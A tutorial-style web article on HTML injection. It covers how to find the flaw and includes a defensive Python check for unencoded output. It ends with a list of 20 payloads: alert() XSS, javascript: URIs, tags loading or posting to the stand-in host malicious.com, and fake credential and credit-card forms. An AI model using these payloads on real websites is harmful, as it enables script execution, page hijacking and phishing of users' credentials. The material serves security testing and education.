HTML Injection | Cheat Sheet | How To Find HTML Injection

HTML injection is a type of security vulnerability that occurs when an attacker is able to inject malicious HTML code into a web page. This can be used to steal sensitive information, redirect users to malicious websites, or even execute arbitrary code on the user’s device.

HTML injection is a serious security vulnerability that can have severe consequences for both the website owner and the users of the website. In this article, we will take a closer look at what HTML injection is, how it can be found, and some common payloads used in HTML injection attacks.

What is HTML Injection?

An attacker gets malicious HTML code into a web page either by exploiting a vulnerability in the website’s code, or by tricking the website’s users into submitting malicious HTML code through forms or other inputs.

Once the malicious HTML code has been injected into the web page, it can be used to steal sensitive information such as login credentials, personal information, or even financial information. It can also be used to redirect users to malicious websites, which in turn distribute malware or carry out phishing attacks, or even to execute arbitrary code on the user’s device.

How to Find HTML Injection

Finding HTML injection vulnerabilities can be a difficult task, as they are often hidden within the website’s code. However, there are a few techniques that can be used to find these vulnerabilities.

One of the most common techniques used to find HTML injection vulnerabilities is manual testing. This involves manually testing the website’s inputs and forms for any signs of injection. This can include submitting special characters or HTML code through forms or inputs and checking the website’s response.

Another technique that can be used to find HTML injection vulnerabilities is automated testing. This involves using a tool that can automatically test the website’s inputs and forms for any signs of injection. There are a number of tools available for this, including Burp Suite and OWASP ZAP.

Finally, it is also possible to find HTML injection vulnerabilities by conducting a code review. This involves manually reviewing the website’s code to look for any signs of injection. This can be a time-consuming process, but it can be an effective way to find hidden injection vulnerabilities.
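
The manual-testing and code-review checks described above, as an added example that is not part of the original article: a harmless probe made of the characters HTML treats specially is passed through three constructed renderers, and the check reports which characters come back unencoded at each place the probe is reflected. The probe, the template, and all function names are hypothetical.

```python
import html
import re

# Hypothetical probe: unique markers around the characters HTML treats specially.
MARK_OPEN, MARK_CLOSE = "hi7x", "z7ih"
SPECIALS = "<>\"'"
PROBE = MARK_OPEN + SPECIALS + MARK_CLOSE

# Constructed page template: input lands in element text and in an attribute value.
TEMPLATE = '<p>Hello, {0}!</p><input name="q" value="{0}">'


def render_vulnerable(value: str) -> str:
    """The pattern to look for in code review: input concatenated into markup."""
    return TEMPLATE.format(value)


def render_tags_only(value: str) -> str:
    """Incomplete fix: < and > are encoded, quotes are not."""
    return TEMPLATE.format(html.escape(value, quote=False))


def render_escaped(value: str) -> str:
    """Output encoding that also covers the quoted attribute value."""
    return TEMPLATE.format(html.escape(value, quote=True))


def unencoded_chars(body: str) -> list[str]:
    """For each reflection of the probe, return the specials that came back raw."""
    pattern = re.escape(MARK_OPEN) + r"(.*?)" + re.escape(MARK_CLOSE)
    return [
        "".join(c for c in SPECIALS if c in m.group(1))
        for m in re.finditer(pattern, body, re.S)
    ]


if __name__ == "__main__":
    for render in (render_vulnerable, render_tags_only, render_escaped):
        print(f"{render.__name__:18} {unencoded_chars(render(PROBE))}")
```

An empty string for a reflection means every special character was encoded at that spot. Any character still listed for the attribute reflection means the encoding does not cover that context.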

Payloads

  1. <script>alert("XSS")</script>
  2. <img src="javascript:alert('XSS');">
  3. <iframe src="http://malicious.com"></iframe>
  4. <form action="http://malicious.com" method="post">
  5. <a href="javascript:alert('XSS');">Click here</a>
  6. <svg onload=alert(1)>
  7. <input onfocus=alert(1) autofocus>
  8. <body onload=alert(1)>
  9. <object data="http://malicious.com"></object>
  10. <embed src="http://malicious.com"></embed>
  11. <link rel="stylesheet" href="http://malicious.com">
  12. <base href="http://malicious.com">
  13. <frame src="http://malicious.com"></frame>
  14. <applet code="http://malicious.com"></applet>
  15. <form><input name="username" value=""><input name="password" type="password"></form>
  16. <form><input name="email" value=""></form>
  17. <form><input name="address" value=""></form>
  18. <form><input name="phone" value=""></form>
  19. <form><input name="creditcard" value=""></form>
  20. <form><input name="socialsecurity" value=""></form>
